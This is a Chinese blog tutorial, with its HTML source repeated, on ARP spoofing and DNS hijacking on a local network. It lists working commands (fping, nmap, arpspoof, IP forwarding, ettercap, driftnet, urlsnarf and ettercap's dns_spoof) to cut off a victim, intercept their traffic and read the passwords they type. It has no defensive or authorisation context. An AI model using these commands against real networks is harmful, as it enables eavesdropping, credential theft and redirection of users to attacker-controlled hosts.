中间人攻击之dns劫持与ARP欺骗

博主： literature
发布时间：2019 年 03 月 10 日
162 次浏览
关闭评论
827字数
分类：主机教程

arp欺骗

首先连接wifi，进入内网

1，查看内网的存活主机命令
```
fping -asg 192.168.1.0/24
```
也可以用nmap扫描
```
nmap -T4 -A 192.168.1.0/24
```
(视不同环境而定，假设这里的路由器地址为 192.168.1.1)
也可利用其他工具查看其他主机，方法有很多

2，arp欺骗
命令
```
arpspoof -i wlan0 -t 192.168.1.2(目标的内网地址) 192.168.1.1
```
上面一句就对192.168.1.2实施了欺骗，此时该主机是断网的
3，流量转发我们将劫持到的流量通过自己发机器转发到受害人的机器上，让其恢复网络

转发命令

echo 1 >/proc/sys/net/ipv4/ip_forward   将参数换为1

这时可以启用 wireshark 抓包工具进行抓包
或者直接获取流量包

ettercap -Tq -i wlan0

这样被人输入密码后，我们就可以直接看到。
获取图片和浏览的网站

driftnet -i wlan0
urlsnarf -i wlan0

dns劫持

修改/etc/ettercap/etter.dns 添加自己的ip和劫持域名

开始进行DNS欺骗攻击：

ettercap -i eth0 -Tp -M arp:remote -P dns_spoof /192.168.127.211// /192.168.127.2//

进行DNS 欺骗后，再次测试：ping www.sina.com.cn ，发现将www.sina.com.cn 解析指向了攻击者主机（192.168.127.208）

版权属于：逍遥子大表哥

本文链接：https://blog.bbskali.cn/842.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

最后修改：2023 年 08 月 04 日

© 允许规范转载

如果觉得我的文章对你有用，请随意赞赏

此处评论已关闭

中间人攻击之dns劫持与ARP欺骗

literature • 2019 年 03 月 10 日

<h3>arp欺骗</h3><p>首先连接wifi，进入内网<br /></p><div class="handsome_aplayer player-content" data-preload="auto" data-autoplay="false" data-listmaxheight="340px" data-order="list" data-media="netease" data-id="156374" data-type="song" data-size="large" data-auto="false"><div class="handsomePlayer-tip-loading"><span></span><br />
<span></span><br />
<span></span><br />
<span></span><br />
<span></span></div><div class="handsome_aplayer_music" data-id="156374" data-server="netease" data-type="song" data-auth="9e0fe358ad5957dd139dcf995f240a7a"></div></div><p></p><ul>
 <li><p>1，查看内网的存活主机命令</p><pre><code>fping -asg 192.168.1.0/24</code></pre><p>也可以用<code>nmap扫描</code></p><pre><code>nmap -T4 -A 192.168.1.0/24</code></pre><p>(视不同环境而定，假设这里的路由器地址为 <code>192.168.1.1</code>)<br />也可利用其他工具查看其他主机，方法有很多</p></li>
</ul><ul>
 <li><p>2，arp欺骗<br />命令</p><pre><code>arpspoof -i wlan0 -t 192.168.1.2(目标的内网地址) 192.168.1.1</code></pre><p>上面一句就对192.168.1.2实施了欺骗 ，此时该主机是断网的</p></li>
 <li>3，流量转发 我们将劫持到的流量通过自己发机器转发到受害人的机器上，让其恢复网络</li>
</ul><p>转发命令</p><pre><code>echo 1 >/proc/sys/net/ipv4/ip_forward   将参数换为1</code></pre><p>这时可以启用<code> wireshark </code>抓包工具进行抓包<br />或者直接获取流量包</p><pre><code>ettercap -Tq -i wlan0</code></pre><p>这样被人输入密码后，我们就可以直接看到。<br />获取图片和浏览的网站</p><pre><code>driftnet -i wlan0
urlsnarf -i wlan0</code></pre><h3>dns劫持</h3><p>修改<code>/etc/ettercap/etter.dns</code> 添加自己的ip和劫持域名</p><p><img src="https://ws3.sinaimg.cn/large/cc788230ly1g0xr65vifrj20k906qgov.jpg" alt="03.png" title="03.png" style="" class="aligncenter"style=""><br />开始进行DNS欺骗攻击：</p><pre><code>ettercap -i eth0 -Tp -M arp:remote -P dns_spoof /192.168.127.211// /192.168.127.2//</code></pre><p><img src="https://ws3.sinaimg.cn/large/cc788230ly1g0xrh3zy0fj20k70crwln.jpg" alt="as.png" title="as.png" style="" class="aligncenter"style=""><br />进行DNS 欺骗后，再次测试：<code>ping www.sina.com.cn</code> ，发现将<code>www.sina.com.cn</code> 解析指向了攻击者主机（<code>192.168.127.208</code>）</p><p><img src="https://ws3.sinaimg.cn/large/cc788230ly1g0xrc5i8hlj20kc08b791.jpg" alt="01.png" title="01.png" style="" class="aligncenter"style=""></p><p><hr class="content-copyright" style="margin-top:50px"></p><div class="post-copyright" style="font-style:normal"><p class="iconfont-copyright"><i class="glyphicon glyphicon-copyright-mark"></i></p><p class="content-copyright">版权属于：逍遥子大表哥</p><p class="content-copyright">本文链接：https://blog.bbskali.cn/842.html</p><p class="content-copyright">按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。</p></div>